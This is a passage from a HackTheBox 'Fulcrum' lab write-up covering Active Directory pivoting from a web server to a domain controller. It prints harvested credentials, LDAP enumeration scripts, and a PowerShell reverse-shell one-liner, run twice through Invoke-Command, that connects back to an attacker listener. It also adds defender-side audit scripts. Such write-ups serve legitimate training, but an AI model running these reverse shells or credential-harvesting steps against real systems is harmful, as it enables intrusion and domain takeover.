[192.168.30.130]: PS C:\Users\WebUser\Documents&amp;gt; $env:UserName
WebUser
[192.168.30.130]: PS C:\Users\WebUser\Documents&amp;gt; $env:UserDomain
WEBSERVER
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h3 id=&quot;pivoting-from-webserver-to-fileserver&quot;&gt;Pivoting from WebServer to FileServer&lt;/h3&gt;

&lt;p&gt;If you attempt to read the contents of the user flag, you get a message stating that &lt;code class=&quot;highlighter-rouge&quot;&gt;You need to go deeper!&lt;/code&gt;. Inspecting the &lt;code class=&quot;highlighter-rouge&quot;&gt;CheckFileServer.ps1&lt;/code&gt; powershell script, we can see that they are hinting that most likely there is another host on the network.&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-Powershell&quot;&gt;[192.168.30.130]: PS C:\Users\WebUser\Documents&amp;gt; dir


    Directory: C:\Users\WebUser\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/2/2017   8:39 PM            260 CheckFileServer.ps1
-a----       10/12/2017   4:23 AM          33266 Invoke-PsExec.ps1
-a----        10/2/2017   8:23 PM             24 user.txt



[192.168.30.130]: PS C:\Users\WebUser\Documents&amp;gt; type .\user.txt
You need to go deeper!

[192.168.30.130]: PS C:\Users\WebUser\Documents&amp;gt; type .\CheckFileServer.ps1
$Server = '127.0.0.1' # Waiting on IT to give me the address...
$Creds = Get-Credential -Message 'Please enter file server credentials'

Get-CimClass -ClassName win32_operatingsystem -ComputerName $Server -Credential $Creds

# TODO: can't get this to work
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Since the hostname of this system is &lt;em&gt;“WebServer”&lt;/em&gt; we should probably inspect the contents of the webroot… Inspecting the &lt;code class=&quot;highlighter-rouge&quot;&gt;web.config&lt;/code&gt; we find credentials that look like they will allow us to run LDAP queries.&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;[192.168.30.130]: PS C:\inetpub\wwwroot&amp;gt; dir


    Directory: C:\inetpub\wwwroot


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/2/2017   8:09 PM           5359 index.htm
-a----        10/2/2017   8:11 PM           1310 web.config


[192.168.30.130]: PS C:\inetpub\wwwroot&amp;gt; type web.config
&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&amp;gt;
&amp;lt;configuration xmlns=&quot;http://schemas.microsoft.com/.NetConfiguration/v2.0&quot;&amp;gt;
    &amp;lt;appSettings /&amp;gt;
    &amp;lt;connectionStrings&amp;gt;
        &amp;lt;add connectionString=&quot;LDAP://dc.fulcrum.local/OU=People,DC=fulcrum,DC=local&quot; name=&quot;ADServices&quot; /&amp;gt;
    &amp;lt;/connectionStrings&amp;gt;
    &amp;lt;system.web&amp;gt;
        &amp;lt;membership defaultProvider=&quot;ADProvider&quot;&amp;gt;
            &amp;lt;providers&amp;gt;
                &amp;lt;add name=&quot;ADProvider&quot; type=&quot;System.Web.Security.ActiveDirectoryMembershipProvider, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a&quot; connectionStringName=&quot;ADConnString&quot; connectionUsername=&quot;FULCRUM\LDAP&quot; connectionPassword=&quot;PasswordForSearching123!&quot; attributeMapUsername=&quot;SAMAccountName&quot; /&amp;gt;
            &amp;lt;/providers&amp;gt;
        &amp;lt;/membership&amp;gt;
    &amp;lt;/system.web&amp;gt;
...[snip]...
[192.168.30.130]: PS C:\inetpub\wwwroot&amp;gt;

&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h4 id=&quot;querying-ldap-for-information&quot;&gt;Querying LDAP for Information&lt;/h4&gt;

&lt;p&gt;At the time, I didn’t bother writing a proper LDAP query, so I used the inelegant method of just running a query that matches absolutely every object/filter, and manually inspecting the output for interesting information.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Querying LDAP in Powershell&lt;/em&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-Powershell&quot;&gt;$username = 'LDAP'
$password = 'PasswordForSearching123!'
$DomainControllerIpAddress = 'dc.fulcrum.local'
$LdapDn = 'dc=fulcrum,dc=local'
$dn = New-Object System.DirectoryServices.DirectoryEntry (&quot;LDAP://$($DomainControllerIpAddress):389/$LdapDn&quot;,$username,$password)
$ds = new-object System.DirectoryServices.DirectorySearcher($dn)
$ds.filter = &quot;((ObjectClass=*))&quot;
$ds.SearchScope = &quot;subtree&quot;
$ds.PropertiesToLoad.Add(&quot;distinguishedName&quot;)
$ds.PropertiesToLoad.Add(&quot;sAMAccountName&quot;)
$ds.PropertiesToLoad.Add(&quot;lastLogon&quot;)
$ds.PropertiesToLoad.Add(&quot;memberOf&quot;)
$ds.PropertiesToLoad.Add(&quot;distinguishedname&quot;)
$ds.FindAll()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/assets/images/htb/fulcrum/8.png&quot; alt=&quot;&amp;quot;Fulcrum LDAP Query Output&amp;quot;&quot; title=&quot;Fulcrum LDAP Query Output&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Output:&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;...[snip]...
LDAP://dc.fulcrum.local:389/CN=FILE,CN=Computers,DC=fulcrum,DC=local                                                                             {distinguishedname, samaccountname, adspath, lastlogon}
LDAP://dc.fulcrum.local:389/CN=Bobby Tables,OU=People,DC=fulcrum,DC=local                                                                        {distinguishedname, samaccountname, adspath, lastlogon}
LDAP://dc.fulcrum.local:389/OU=People,DC=fulcrum,DC=local                                                                                        {distinguishedname, adspath}
LDAP://dc.fulcrum.local:389/CN=LDAP Lookup,OU=People,DC=fulcrum,DC=local                                                                         {distinguishedname, samaccountname, adspath, lastlogon}
LDAP://dc.fulcrum.local:389/CN=be36,OU=People,DC=fulcrum,DC=local                                                                                {memberof, distinguishedname, samaccountname, adspath...}
LDAP://dc.fulcrum.local:389/CN=8631,OU=People,DC=fulcrum,DC=local                                                                                {memberof, distinguishedname, samaccountname, adspath...}
LDAP://dc.fulcrum.local:389/CN=9791,OU=People,DC=fulcrum,DC=local                                                                                {memberof, distinguishedname, samaccountname, adspath...}
LDAP://dc.fulcrum.local:389/CN=879f,OU=People,DC=fulcrum,DC=local                                                                                {memberof, distinguishedname, samaccountname, adspath...}
LDAP://dc.fulcrum.local:389/CN=953d,OU=People,DC=fulcrum,DC=local                                                                                {memberof, distinguishedname, samaccountname, adspath...}
LDAP://dc.fulcrum.local:389/CN=81b2,OU=People,DC=fulcrum,DC=local                                                                                {memberof, distinguishedname, samaccountname, adspath...}
LDAP://dc.fulcrum.local:389/CN=97f0,OU=People,DC=fulcrum,DC=local                                                                                {memberof, distinguishedname, samaccountname, adspath...}
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;From the output of our LDAP query we can see some interesting objects, including the name of the file server, &lt;em&gt;file.fulcrum.local&lt;/em&gt;, and a user that looks different from the rest, “Bobby Tables”. We can run a more targeted query on the common name (CN) “bobby”, this time loading all the properties mapped to the object.&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-Powershell&quot;&gt;$username = 'LDAP'
$password = 'PasswordForSearching123!'
$DomainControllerIpAddress = 'dc.fulcrum.local'
$LdapDn = 'dc=fulcrum,dc=local'
$dn = New-Object System.DirectoryServices.DirectoryEntry (&quot;LDAP://$($DomainControllerIpAddress):389/$LdapDn&quot;,$username,$password)
$ds = new-object System.DirectoryServices.DirectorySearcher($dn)
$ds.filter = &quot;((cn=bobby*))&quot;
$ds.SearchScope = &quot;subtree&quot;
$ds.PropertiesToLoad.Add(&quot;*&quot;)
$data = $ds.FindAll()
$data.Properties
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Doing so gives us the following output…&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Name                           Value
----                           -----
logoncount                     {18}
codepage                       {0}
objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}
description                    {Has logon rights to the file server}
usnchanged                     {143447}
instancetype                   {4}
name                           {Bobby Tables}
badpasswordtime                {131522885566857829}
pwdlastset                     {131514417841217344}
objectclass                    {top, person, organizationalPerson, user}
badpwdcount                    {0}
samaccounttype                 {805306368}
lastlogontimestamp             {131556801131693417}
usncreated                     {12878}
objectguid                     {88 53 29 79 114 147 100 75 187 41 125 239 148 113 13 111}
info                           {Password set to ++FileServerLogon12345++}
whencreated                    {10/2/2017 6:06:57 PM}
adspath                        {LDAP://dc.fulcrum.local:389/CN=Bobby Tables,OU=People,DC=fulcrum,DC=local}
useraccountcontrol             {66048}
cn                             {Bobby Tables}
countrycode                    {0}
primarygroupid                 {513}
whenchanged                    {11/20/2017 7:35:13 PM}
dscorepropagationdata          {10/2/2017 6:09:28 PM, 10/2/2017 6:06:57 PM, 1/1/1601 12:00:00 AM}
lastlogon                      {131556801131693417}
distinguishedname              {CN=Bobby Tables,OU=People,DC=fulcrum,DC=local}
samaccountname                 {BTables}
objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 70 111 187 188 76 255 138 170 168 71 215 161 80 4 0 0}
lastlogoff                     {0}
displayname                    {Bobby Tables}
accountexpires                 {9223372036854775807}
userprincipalname              {BTables@fulcrum.local}

&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;It seems we might have discovered Bobby Tables’ credentials, and from the “description” he &lt;em&gt;should&lt;/em&gt; have logon rights to the file server (file.fulcrum.local).&lt;/p&gt;
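&lt;p&gt;The reason the dump-everything approach paid off is that a password had been written into the &lt;code class=&quot;highlighter-rouge&quot;&gt;info&lt;/code&gt; attribute of a user object, which any authenticated account can read. The following PowerShell is an added example, not the write-up’s query: a defender-side audit that asks the directory for user objects whose free-text attributes mention a password, using a server-side filter instead of pulling every object. The server name, base DN and credential are assumptions.&lt;/p&gt;

```powershell
# Added example, not the write-up's query: an AD hygiene check for user accounts whose
# free-text attributes (info, description, comment) mention a password. Server, base DN
# and credential are assumptions; replace them with your own.
function Find-PasswordInAdText {
    param(
        [string]$Server = 'dc.example.local',            # assumed
        [string]$BaseDn = 'DC=example,DC=local',         # assumed
        [pscredential]$Credential                        # optional; omit to use the current logon
    )
    $path = "LDAP://$Server/$BaseDn"
    $root = if ($Credential) {
        New-Object System.DirectoryServices.DirectoryEntry (
            $path, $Credential.UserName, $Credential.GetNetworkCredential().Password)
    } else {
        New-Object System.DirectoryServices.DirectoryEntry ($path)
    }
    $searcher = New-Object System.DirectoryServices.DirectorySearcher ($root)
    # Server-side substring filter on the text attributes (AD matches case-insensitively);
    # the object class is checked client-side below, so the filter needs no AND clause.
    $searcher.Filter = '(|(info=*pass*)(info=*pwd*)(description=*pass*)(description=*pwd*)(comment=*pass*)(comment=*pwd*))'
    $searcher.SearchScope = 'Subtree'
    $searcher.PageSize = 1000                            # paged results, so large OUs are not truncated
    foreach ($attr in 'objectClass', 'sAMAccountName', 'info', 'description', 'comment', 'memberOf') {
        [void]$searcher.PropertiesToLoad.Add($attr)
    }
    foreach ($r in $searcher.FindAll()) {
        # Keep real user accounts only: computers also carry the 'user' class, so exclude them.
        $classes = @($r.Properties['objectclass'])
        if ($classes -notcontains 'user' -or $classes -contains 'computer') { continue }
        [pscustomobject]@{
            Account     = [string]($r.Properties['samaccountname'] | Select-Object -First 1)
            Info        = ($r.Properties['info'] -join ' ')
            Description = ($r.Properties['description'] -join ' ')
            Comment     = ($r.Properties['comment'] -join ' ')
            GroupCount  = @($r.Properties['memberof']).Count
        }
    }
}
Find-PasswordInAdText -Credential (Get-Credential) | Format-Table -AutoSize
```

&lt;p&gt;Against the box this would have returned only the &lt;em&gt;Bobby Tables&lt;/em&gt; object, because its &lt;code class=&quot;highlighter-rouge&quot;&gt;info&lt;/code&gt; value contains “Password set to”. The same filter is the one a periodic audit should run, since these attributes are readable by every domain member and are not covered by any password policy.&lt;/p&gt;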

&lt;h4 id=&quot;pivoting-to-filefulcrumlocal-with-nishang&quot;&gt;Pivoting to file.fulcrum.local with Nishang&lt;/h4&gt;

&lt;p&gt;Trying to enter another PowerShell Remoting session gives us an error stating that we can’t do multi-hop PSRemoting sessions. Unfortunately we also don’t have permission to enable multi-hop PSRemoting, because we aren’t administrators.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;
[192.168.30.130]: PS C:\Users\WebUser\Documents&amp;gt; Enter-PSSession -Computername file.fulcrum.local -Credential fulcrum.local\btables
Enter-PSSession : You are currently in a Windows PowerShell PSSession and cannot use the Enter-PSSession cmdlet to enter another PSSession.
    + CategoryInfo          : InvalidArgument: (:) [Enter-PSSession], ArgumentException
    + FullyQualifiedErrorId : RemoteHostDoesNotSupportPushRunspace,Microsoft.PowerShell.Commands.EnterPSSessionCommand

[192.168.30.130]: PS C:\Users\WebUser\Documents&amp;gt; Enable-WSManCredSSP –Role Client –DelegateComputer spoke
Access is denied. You need to run this cmdlet from an elevated process.
    + CategoryInfo          : NotSpecified: (:) [Enable-WSManCredSSP], InvalidOperationException
    + FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.WSMan.Management.EnableWSManCredSSPCommand

&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;We are able to call back out to the HTB VPN IP space, so we can use PowerShell’s Invoke-Command to execute commands on the box. We can get a reverse shell by copy-pasting &lt;a href=&quot;https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1&quot;&gt;Nishang’s Invoke-PowerShellTcpOneLine&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Invoke-Command on file.fulcrum.local&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Invoke-Command -ComputerName file.fulcrum.local -Credential fulcrum.local\btables -Port 5985 -ScriptBlock  { $client = New-Object System.Net.Sockets.TCPClient('10.10.15.74',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&amp;gt;&amp;amp;1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '&amp;gt; ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() }
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;getting shell&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~# ncat -lnvp 53
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::53
Ncat: Listening on 0.0.0.0:53
Ncat: Connection from 10.10.10.62.
Ncat: Connection from 10.10.10.62:12873.
whoami
fulcrum\btables
PS C:\Users\BTables\Documents&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;getting user flag&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;PS C:\Users\BTables\Desktop&amp;gt; dir


    Directory: C:\Users\BTables\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/4/2017  10:12 PM             34 user.txt


PS C:\Users\BTables\Desktop&amp;gt; type user.txt
...[snip]...
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h3 id=&quot;pivoting-to-domain-controller-dcfulcrumlocal&quot;&gt;Pivoting to Domain Controller (dc.fulcrum.local)&lt;/h3&gt;

&lt;p&gt;Exploring the system, you discover a myriad of files; the contents of &lt;code class=&quot;highlighter-rouge&quot;&gt;domain_users.csv&lt;/code&gt; appear to be a list of usernames and passwords for various domain users.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;PS C:\Users\BTables&amp;gt; dir


    Directory: C:\Users\BTables


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        10/4/2017  10:12 PM                Desktop
d-r---        10/9/2017   8:22 PM                Documents
d-r---        7/16/2016   2:18 PM                Downloads
d-r---        7/16/2016   2:18 PM                Favorites
d-r---        7/16/2016   2:18 PM                Links
d-r---        7/16/2016   2:18 PM                Music
d-r---        7/16/2016   2:18 PM                Pictures
d-----        7/16/2016   2:18 PM                Saved Games
d-r---        7/16/2016   2:18 PM                Videos
-a----       10/12/2017   8:09 PM           5502 check-auth.ps1
-a----       10/12/2017   7:48 PM          45011 domain_users.csv
-a----       10/12/2017   7:21 PM          21002 file.txt
-a----       10/12/2017   7:21 PM          21002 file2.txt
-a----       10/12/2017   7:48 PM          45011 merged.txt
-a----       10/12/2017   7:43 PM          90002 merged2.txt
-a----       10/12/2017   7:39 PM          21002 Output.txt
-a----       10/12/2017   7:23 PM          75002 pass.txt
-a----       10/12/2017   7:23 PM          75002 pass2.txt
-a----       10/12/2017   9:16 PM          21000 result.txt
-a----       10/12/2017   9:04 PM             42 test.csv
-a----       10/12/2017   7:14 PM          18002 users.txt
-a----       10/12/2017   7:22 PM              0 wordlist.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;&lt;em&gt;contents of “domain_users.csv”&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;...[snip]...
a7e6,@fulcrum_e9f86a021507_$
9cea,@fulcrum_1eee5eabb089_$
9e92,@fulcrum_efecb22c5b82_$
8d25,@fulcrum_70e0e02bd594_$
9923,@fulcrum_17f672dfcc78_$
b0b6,@fulcrum_7a5f2af5237e_$
9e2a,@fulcrum_acd5008a3f9d_$
a700,@fulcrum_47ff4e46a43f_$
b473,@fulcrum_110bf7e71ecd_$
984a,@fulcrum_d254c73f8dab_$
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;I forgot to mention, but from our earlier enumeration we could have discovered which users are in Domain Admins by querying LDAP. I forgot to record the exact query I used, but to give a baseline idea, the LDAP filter would have looked something like: &lt;code class=&quot;highlighter-rouge&quot;&gt;(&amp;amp;(objectCategory=user)(memberOf=CN=Domain Admins,CN=People,DC=fulcrum,dc=local))&lt;/code&gt;. Either way, by brute-forcing the credentials with a script or by querying LDAP, you would discover that the user &lt;code class=&quot;highlighter-rouge&quot;&gt;923a&lt;/code&gt; is in the Domain Admins group.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;PS C:\Users\BTables&amp;gt; type domain_users.csv | findstr &quot;923a&quot;
9f68,@fulcrum_df0923a7ca40_$
923a,@fulcrum_bf392748ef4e_$
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
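&lt;p&gt;A defender’s version of that check, as an added example that is not part of the original write-up: it reads a leaked &lt;code class=&quot;highlighter-rouge&quot;&gt;user,password&lt;/code&gt; file in the domain_users.csv format and reports which of the listed accounts are members of Domain Admins (directly or through nested groups) via an LDAP query, so those accounts can be reset first. The CSV path and the group DN are assumptions (the page’s own filter used CN=People), it is meant to run from a domain-joined host, and the password column is never printed.&lt;/p&gt;

```powershell
# Added example (not from the original write-up): triage a leaked
# "user,password" file such as domain_users.csv by cross-referencing the
# usernames against Domain Admins membership over LDAP. The path and the
# group DN below are assumptions; adjust them for the domain in question.
param(
    [string]$CsvPath = '.\domain_users.csv',
    # Assumption: the group lives in the default Users container.
    [string]$GroupDn = 'CN=Domain Admins,CN=Users,DC=fulcrum,DC=local'
)

# LDAP_MATCHING_RULE_IN_CHAIN (OID 1.2.840.113556.1.4.1941) follows nested
# group membership, so an account that is a Domain Admin only through an
# intermediate group is returned as well.
$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.Filter = "(memberOf:1.2.840.113556.1.4.1941:=$GroupDn)"
$searcher.PageSize = 1000
[void]$searcher.PropertiesToLoad.Add('sAMAccountName')

$admins = foreach ($result in $searcher.FindAll()) {
    [string]$result.Properties['samaccountname'][0]
}

# The dump has no header row; the second column is a cleartext password,
# which is deliberately never written to the console or to disk here.
$leaked = Import-Csv -Path $CsvPath -Header 'user', 'password'

$privileged = @($leaked | Where-Object { $admins -contains $_.user })

"{0} leaked accounts, {1} of them in Domain Admins" -f @($leaked).Count, $privileged.Count
$privileged | ForEach-Object { "  reset first: $($_.user)" }
```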
&lt;p&gt;&lt;em&gt;getting shell on the domain controller dc.fulcrum.local&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Invoke-Command -ComputerName dc.fulcrum.local -Credential 923a -Port 5985 -ScriptBlock { $client = New-Object System.Net.Sockets.TCPClient('10.10.15.74',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&amp;gt;&amp;amp;1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '&amp;gt; ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() }
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~# nc -lnvp 53
listening on [any] 53 ...
connect to [10.10.15.74] from (UNKNOWN) [10.10.10.62] 1559

PS C:\Users\923a\Documents&amp;gt; whoami
fulcrum\923a
PS C:\Users\923a\Documents&amp;gt;whoami /groups

GROUP INFORMATION
-----------------

Group Name                                     Type             SID                                           Attributes
============================================== ================ ============================================= ===============================================================
Everyone                                       Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                  Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access     Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                         Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                           Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users               Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                 Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
FULCRUM\Domain Admins                          Group            S-1-5-21-3166400326-2861236044-2715240360-512 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity     Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group
FULCRUM\Denied RODC Password Replication Group Alias            S-1-5-21-3166400326-2861236044-2715240360-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level           Label            S-1-16-12288
PS C:\Users\923a&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;Box finally complete :)&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;PS C:\Users\Administrator\Desktop&amp;gt; type root.txt
...[snip]...
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;</content><author><name>A Medic (@OnlyaMedic)</name></author><category term="writeup" /><category term="pentesting" /><category term="hackthebox" /><category term="xxe" /><category term="windows" /><category term="pivoting" /><summary type="html">Introduction Wew this box had aaaaaaaaaalot of steps. Honestly, I feel like a lot of the difficultly perceived with this box came from the heavy need to use powershell. Nonetheless it definitely set the bar of being one of the more in-depth challenges because of all the steps required to reach the end goal. The pivoting was a very nice touch, and I wish there were more hack the box boxes that were architected in this manner with multiple machines or networks. I went a little bit more in-depth with the write-up, and included some fails, and rabbit-hole detection techniques. Tools Used Nmap BurpSuite GoBuster Ncat Powershell Metasploit Framework socat Nishang Enumeration Initial Scanning Like always lets begin with a nmap scan agaisn’t the fulcrum machine (10.10.10.62). You need to run a full portscan to ensure you didn’t miss the service running on port 56423. root@dastinia:~/htb/fulcrum# nmap -T4 -sV -sC -Pn -p- 10.10.10.62 -oA fulcrum_fullscan Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-10 15:16 EDT Nmap scan report for 10.10.10.62 Host is up (0.16s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 4/tcp open http nginx 1.10.3 (Ubuntu) |_http-server-header: nginx/1.10.3 (Ubuntu) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a8:28:6e:d0:af:ab:46:de:c5:09:3d:76:ad:5a:44:e0 (RSA) | 256 c1:5c:1d:ea:99:ec:e0:a1:dc:04:c5:5a:ad:50:36:f6 (ECDSA) |_ 256 a5:2f:44:e6:e3:10:cf:f7:db:15:d1:3f:49:21:3a:7b (ED25519) 80/tcp open http nginx 1.10.3 (Ubuntu) | http-methods: |_ Potentially risky methods: TRACE |_http-title: Input string was not in a correct format. 
88/tcp open http nginx 1.10.3 (Ubuntu) | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: nginx/1.10.3 (Ubuntu) |_http-title: phpMyAdmin 9999/tcp open http nginx 1.10.3 (Ubuntu) |_http-server-header: nginx/1.10.3 (Ubuntu) |_http-title: Login 56423/tcp open http nginx 1.10.3 (Ubuntu) |_http-title: Site doesn't have a title (application/json;charset=utf-8). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 775.49 seconds Enumerating Port 4 Visting the web service on port 4, displays an “Under Maintenance” Page. Clicking to try again redirects you to /index.php? page=homeLooking at this we might be able to take advantage of a file include (or SSRF) type vulnerability just based on the page parameter. @Jhaddix gave a great talk called “Hunt” at defcon, and to sum it up it’s an analysis of web vulnerabilities, and their most common parameters associated with those vulnerability.” I highly recommend reading/watching the video on the talk because it will help recognize potential vulnberbilites in web applications much quicker. Running gobuster against the site, reveals us some additional content to explore. 
root@dastinia:~/htb/fulcrum# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.62:4 -x php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_fulcrum_4r_fulcrum_4 Gobuster v1.2 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://10.10.10.62:4/ [+] Threads : 100 [+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes : 302,307,403,200,204,301 [+] Extensions : .php,.html ===================================================== /index.php (Status: 200) /home.php (Status: 200) /upload.php (Status: 200) ===================================================== Going directly to http: //10.10.10.62:4/home.php brings us to the fulcrum file upload page. Attempting to upload anything using the file upload capability always end up with an error occurring, even while attempting to upload a regular unmodified image file. We are going to keep a note of this, because it will come in handy later. Enumerating Port 80 I also ran gobuster in the background. For some reason it’s throwing (fake) IIS errors even though it was a ubuntu server using nginx. You could tell right off the back that this service was fake news, and was likely a rabbit hole so I didn’t spend any resources digging deeper. Enumering Port 88 (phpmyadmin) Attempting to authenticate with various combinations of common usernames, and passwords seen on hackthebox machines eg: root:root, admin:admin, admin:password etc.. Every time you attempt to authenticate the following error message would return. From some quick google searching this likely meant that the MySQL Server is misconfigured, or not accepting connections which likely means this was just another rabbit-hole. Enumerating Port 9999 (PFSense) Visiting the service on port 9999 brings us to the homepage of PFsense (an open-source firewall). 
Attempting the default credentials for PFsense, in addition to common hack the box username,password combinous resulted with nothing. You can observe from the footer copyright (which states 2004-2018) this is likely the latest version of PFSense. Another indicator that you can use, if you are familiar with pfsense and how it previously to looked within the past (two? years) they switched the web interface UX styling framework from their (not so pretty custom styling) to bootstrap. If you view the source code of the page, then you see the bootstrap includes, which lets you know that this is likely another rabbit-hole. Enumerating Port 56423 (FulCrum API) Visiting the service on Port 56423 brings us to what appears to be some sort of “API” endpoint. Hitting it with gobuster reveals that, it only has a single resource available for us to hit. root@dastinia:~/htb/fulcrum# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.62:56423 -x php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_fulcrum_56423 Gobuster v1.2 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://10.10.10.62:56423/ [+] Threads : 100 [+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes : 403,200,204,301,302,307 [+] Extensions : .php,.html ===================================================== /index.php (Status: 200) People generally skip over some of the inner thought process of discovering vulerbilities. But in this case, we have no real way of interacting with the api that’s available, so we are likely looking for some sort of blind injection vulnerability. (OS, XPath, XXE, SQLi etc..). We can pretty much rule out an SQL injection because the SQL database from our prior enumeration earlier wasn’t functioning. After attempting a variety of blind injection attacks, you end up discovering it’s blind XXE vulnerability. 
